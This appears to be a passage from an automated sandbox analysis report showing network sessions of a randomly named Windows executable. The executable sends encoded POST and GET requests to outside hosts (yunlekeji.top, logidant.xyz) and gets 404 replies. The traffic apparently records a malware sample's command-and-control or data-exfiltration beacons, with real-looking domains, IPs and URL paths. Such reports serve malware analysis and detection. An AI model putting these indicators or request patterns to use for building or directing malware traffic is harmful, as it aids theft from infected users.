79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <d
Jan 11, 2025 02:51:42.729765892 CET	424	IN	Data Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 Data Ascii: iv class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="bac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49990	165.154.96.210	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:51:44.350641966 CET	1673	OUT	POST /t322/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.yunlekeji.top Origin: http://www.yunlekeji.top Referer: http://www.yunlekeji.top/t322/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 35 33 46 5a 59 6b 6a 77 79 6e 67 74 43 34 47 31 2f 73 50 53 49 76 51 55 72 54 6f 32 4d 74 2b 37 53 61 2f 31 62 61 62 52 50 35 65 50 46 69 34 66 33 79 62 76 61 2f 6c 37 75 61 46 2b 4b 63 45 78 6f 2b 43 6e 71 44 41 54 61 67 45 34 4c 46 38 61 33 70 78 75 6b 36 52 5a 69 38 70 42 70 54 2f 56 48 43 2b 76 71 67 58 49 2b 58 57 62 4a 5a 63 61 73 37 4e 37 30 67 37 47 42 64 42 4f 62 55 51 2b 42 37 61 73 2b 75 42 47 79 67 52 47 5a 4b 74 55 46 76 6e 79 57 36 6a 64 34 56 57 4e 2f 61 30 50 70 55 4e 2f 75 52 4b 67 43 6c 35 66 7a 62 48 77 44 63 57 53 7a 5a 30 6e 49 78 45 34 6c 63 52 34 4f 49 48 59 64 56 58 79 63 63 54 36 37 61 51 4b 72 41 6e 51 79 50 49 6a 30 31 6a 36 76 4b 74 44 70 64 4c 73 48 51 41 56 49 70 37 6d 33 31 4a 75 31 32 7a 30 65 41 6f 79 54 76 35 30 59 63 7a 35 4f 38 46 57 51 31 70 36 4a 46 4a 56 2b 7a 6a 30 4e 52 6e 58 35 36 58 4a 6d 32 46 79 52 62 70 41 [TRUNCATED] Data Ascii: T0JX6z9=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgS53FZYkjwyngtC4G1/sPSIvQUrTo2Mt+7Sa/1babRP5ePFi4f3ybva/l7uaF+KcExo+CnqDATagE4LF8a3pxuk6RZi8pBpT/VHC+vqgXI+XWbJZcas7N70g7GBdBObUQ+B7as+uBGygRGZKtUFvnyW6jd4VWN/a0PpUN/uRKgCl5fzbHwDcWSzZ0nIxE4lcR4OIHYdVXyccT67aQKrAnQyPIj01j6vKtDpdLsHQAVIp7m31Ju12z0eAoyTv50Ycz5O8FWQ1p6JFJV+zj0NRnX56XJm2FyRbpAfZKgeIv0mVh/bJB2NuDRd+jOCyqL6wuMTYlGiBxN2Cy1HNp4suC8BmnTCvws1xggy+f/xTDGuqm4f5WXMYIeOkVC86mqruC01xPWWuTQEf9QhTsbJtLiIf7ZaDkW/yINlD28OuzwxAvsVQKBVdlHAg5UGUbfr+EiEN2Zrk8Nstvpde4lUeBtRr2Iva/rAfyilJlbS2oShRdZkOUb3946TbpR+5RzyUetqoPSnLp7UttKHeRca3X+UTQzCOoIcaB+vW6wsVqiGt8Vx0X7b1Cy4geKeerRr81XygcEj/9SKUuhWkU8uyVFMyN0FEu+kEVEl/e1MJfYZjgSxpB3lwNg8vu9/mNVrsNEKxYVPzHML6o5ZJ//ouBvGo1Bu2l61GfBliMl4FfvujfOkpoE1Wpb/0MPWBmyqSLnYua/JbtTMbEtmm0eRqs3J+hPwMf03EcC+SAjgMP/aZw3VfgJ7uqJAO3PNPuzf6K30Q5YScmatITyMyrTmPc+gRiNu/GFfMh6q0zbOpxVgcTmnbgnM+gBoUePMXQH4qgl2oO8c6MkxycQjnOqnYAMHlFYUuu1LJ6We1m3B8Ez/UNwaB3SjOBs6KnDTMBwyq3vFbHZGaN+/D0O6IRu/I/0/OKJJWFM3X60Sb0Oq+2zp7Gjz+yG5IiPbFlCdTFwuLxs4I [TRUNCATED]
Jan 11, 2025 02:51:45.271297932 CET	1236	IN	HTTP/1.1 404 Not Found Server: F-WEB Date: Sat, 11 Jan 2025 01:51:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 910 Connection: close FAI-W-FLOW: 91039038 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 FAI-W-AGENT_AID: 32663896 Update-Time: 1736399500 Src-Update: true P3P: CP=CAO PSA OUR Origin-Agent-Cluster: ?0 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Frame-Options: SAMEORIGIN Set-Cookie: _cliid=7VDhO9R4znWeM93n; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 01:51:45 GMT; HttpOnly Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 01:51:45 GMT; HttpOnly Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <d
Jan 11, 2025 02:51:45.271327019 CET	424	IN	Data Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 Data Ascii: iv class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="bac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49991	165.154.96.210	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:51:46.899147034 CET	376	OUT	GET /t322/?Ih6=GzF8v0ph3F&T0JX6z9=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg== HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.yunlekeji.top User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 02:51:47.842818975 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Connection: close Date: Sat, 11 Jan 2025 01:51:44 GMT Content-Length: 910 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Download-Options: noopen X-XSS-Protection: 1; mode=block Cache-Flow: 319010181 Origin-Agent-Cluster: ?0 FAI-W-FLOW: 91201038 FAI-W-AGENT-AID: 32663896 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 P3P: CP=CAO PSA OUR X-Permitted-Cross-Domain-Policies: none Server: F-WEB Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="back" style="margin-l
Jan 11, 2025 02:51:47.842837095 CET	163	IN	Data Raw: 65 66 74 3a 20 30 70 78 3b 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 61 63 6b 54 78 74 22 3e e8 bf 94 e5 9b 9e e9 a6 96 e9 Data Ascii: eft: 0px;"><div class="backImg"></div><span class="backTxt"></span></div></a></div></div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49992	45.141.156.114	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:51:52.913625956 CET	633	OUT	POST /iuvu/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.logidant.xyz Origin: http://www.logidant.xyz Referer: http://www.logidant.xyz/iuvu/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 37 79 78 4d 4b 56 72 49 48 54 44 44 32 46 41 51 57 75 57 47 2f 63 4c 7a 78 58 6d 50 68 74 56 46 6e 67 58 31 51 54 68 4e 35 45 49 53 63 66 75 4a 45 2b 30 52 67 66 74 61 6a 43 39 68 39 4a 75 30 74 6c 34 76 73 47 4a 52 56 62 39 2f 56 53 53 2b 34 48 41 6e 35 77 6a 62 36 74 76 42 4a 6a 59 2b 75 77 4d 54 77 68 58 73 77 35 34 47 2b 47 7a 37 45 79 7a 32 69 75 4a 62 31 6a 70 42 42 64 6c 57 50 4a 65 74 71 53 36 53 73 34 68 74 5a 55 6f 39 66 69 69 33 42 43 46 56 41 62 61 56 7a 4d 77 55 55 67 6f 7a 32 74 74 74 32 7a 32 35 53 35 33 32 51 62 39 6b 4c 47 42 56 48 45 3d Data Ascii: T0JX6z9=1E6C75TZpJNES7yxMKVrIHTDD2FAQWuWG/cLzxXmPhtVFngX1QThN5EIScfuJE+0RgftajC9h9Ju0tl4vsGJRVb9/VSS+4HAn5wjb6tvBJjY+uwMTwhXsw54G+Gz7Eyz2iuJb1jpBBdlWPJetqS6Ss4htZUo9fii3BCFVAbaVzMwUUgoz2ttt2z25S532Qb9kLGBVHE=
Jan 11, 2025 02:51:53.587327003 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 01:51:53 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49993	45.141.156.114	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:51:55.460292101 CET	653	OUT	POST /iuvu/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.logidant.xyz Origin: http://www.logidant.xyz Referer: http://www.logidant.xyz/iuvu/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 54 35 56 47 46 6f 58 30 53 72 68 41 5a 45 49 4b 4d 66 72 55 55 2b 39 52 67 54 66 61 6d 36 39 68 38 74 75 30 6f 68 34 76 62 79 4b 58 46 62 2f 33 31 53 55 77 59 48 41 6e 35 77 6a 62 36 34 41 42 4a 37 59 2b 2b 41 4d 53 54 35 59 6b 51 35 35 42 2b 47 7a 2f 45 79 33 32 69 75 52 62 33 62 54 42 48 5a 6c 57 4f 35 65 74 34 71 35 62 73 34 76 77 70 56 64 37 61 50 31 75 7a 2f 71 58 67 7a 75 63 43 63 4b 59 43 52 43 70 55 6c 72 75 32 62 64 35 52 52 42 7a 6e 47 56 2b 6f 57 78 4c 51 51 4b 54 34 4a 74 48 38 54 57 49 54 7a 41 6b 36 4b 61 50 59 46 55 Data Ascii: T0JX6z9=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OT5VGFoX0SrhAZEIKMfrUU+9RgTfam69h8tu0oh4vbyKXFb/31SUwYHAn5wjb64ABJ7Y++AMST5YkQ55B+Gz/Ey32iuRb3bTBHZlWO5et4q5bs4vwpVd7aP1uz/qXgzucCcKYCRCpUlru2bd5RRBznGV+oWxLQQKT4JtH8TWITzAk6KaPYFU
Jan 11, 2025 02:51:56.128604889 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 01:51:56 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49994	45.141.156.114	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:51:58.006774902 CET	1670	OUT	POST /iuvu/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.logidant.xyz Origin: http://www.logidant.xyz Referer: http://www.logidant.xyz/iuvu/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 53 42 56 47 32 77 58 30 7a 72 68 42 5a 45 49 55 63 66 71 55 55 2f 2f 52 67 4c 62 61 6d 6d 44 68 2b 6c 75 79 4b 70 34 6e 4b 79 4b 65 46 62 2f 6f 6c 53 52 2b 34 48 5a 6e 39 63 6e 62 36 6f 41 42 4a 37 59 2b 34 6b 4d 47 77 68 59 69 51 35 34 47 2b 48 79 37 45 79 66 32 69 32 42 62 78 48 44 42 58 35 6c 58 74 42 65 76 4c 53 35 48 38 35 4a 67 35 56 46 37 61 4b 79 75 7a 69 52 58 67 32 37 63 45 73 4b 59 44 30 42 35 41 31 7a 77 48 4c 7a 38 44 35 52 79 31 69 61 38 4a 71 45 4e 6a 41 51 51 59 74 2b 48 63 66 34 4d 6c 43 38 6d 2b 4f 7a 4c 74 6f 46 5a 69 32 46 55 30 45 36 30 43 6c 39 54 6c 54 4d 35 4b 2b 2b 56 50 78 65 61 6a 39 53 34 6b 54 4b 69 6e 6b 4b 6a 50 6e 6e 6f 4f 53 2f 6e 30 53 52 4b 37 62 61 30 43 62 69 58 41 64 34 61 34 76 71 31 47 4e 67 74 49 32 73 5a 69 38 74 6c 39 50 2b 30 77 33 4f 76 70 4b 78 6d 63 69 6b 42 31 7a 76 32 2f 74 54 31 38 6e 66 41 61 4a 49 6b 4a [TRUNCATED] Data Ascii: T0JX6z9=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OSBVG2wX0zrhBZEIUcfqUU//RgLbammDh+luyKp4nKyKeFb/olSR+4HZn9cnb6oABJ7Y+4kMGwhYiQ54G+Hy7Eyf2i2BbxHDBX5lXtBevLS5H85Jg5VF7aKyuziRXg27cEsKYD0B5A1zwHLz8D5Ry1ia8JqENjAQQYt+Hcf4MlC8m+OzLtoFZi2FU0E60Cl9TlTM5K++VPxeaj9S4kTKinkKjPnnoOS/n0SRK7ba0CbiXAd4a4vq1GNgtI2sZi8tl9P+0w3OvpKxmcikB1zv2/tT18nfAaJIkJQo0xywPUAF2J+bw3aSn8/suMT4v+H7JbiywjYUN8COYgT2FbUMC+/uCwYPynE7p34GXEa9Uuz0PPxrzuUCaIO5wCKz9DA85F36xdyBTBPZobdnwEcuI6EQz+8hoso2aE+hhG0/Cy2rdoEQ+nO9gSWJLGfXkBQO7mGLiFhu3c8dJrEGhFVfv5OxDunHUU44VS90k6IQgNx0FHPY3QjLvKwk41Smvik3dgqBplEFn4+v6TzVZY51rh+WG7Zaj13/fz/1hKc8BPx7JP6hB/dyAZE/st/O3Q3+i079qggMDI6xvNtcnNv+pqATyq34qZ/OIQZ0AP7I+lfXRJAyEjKpXdZEXaIHc/40nAEvXJTzsgJbjik84t0GZhbNW9KP/4iqvFyENloxFT0t4zRrJwJ9NdgTidGbxXSxTeZNJRtq69Dm/whPxj5dWl6ezFCqNtZQQO1CpUwO1xnO7uXjIf9zWsUbIXOeFxEk8krUYTSczrEup5iQFtCzROQNmmbZoUIVfJjO3uf4NE+wIpzeeo5Oi7DMq0NgMsntPKBRvmT4VsRTjfhTV6Lx/pkuhdL42+RbtyymRwEECFMIg/p/Bfw697olKjjy6Wwq4Me+dmtF4UTXE8SDr2KiBLd09yebBHDNUbCmsSPMgze6/QypIflmi1rwLCsCvO2OLWBF [TRUNCATED]
Jan 11, 2025 02:51:58.703334093 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 01:51:58 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49995	45.141.156.114	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:52:00.551803112 CET	375	OUT	GET /iuvu/?T0JX6z9=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&Ih6=GzF8v0ph3F HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.logidant.xyz User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
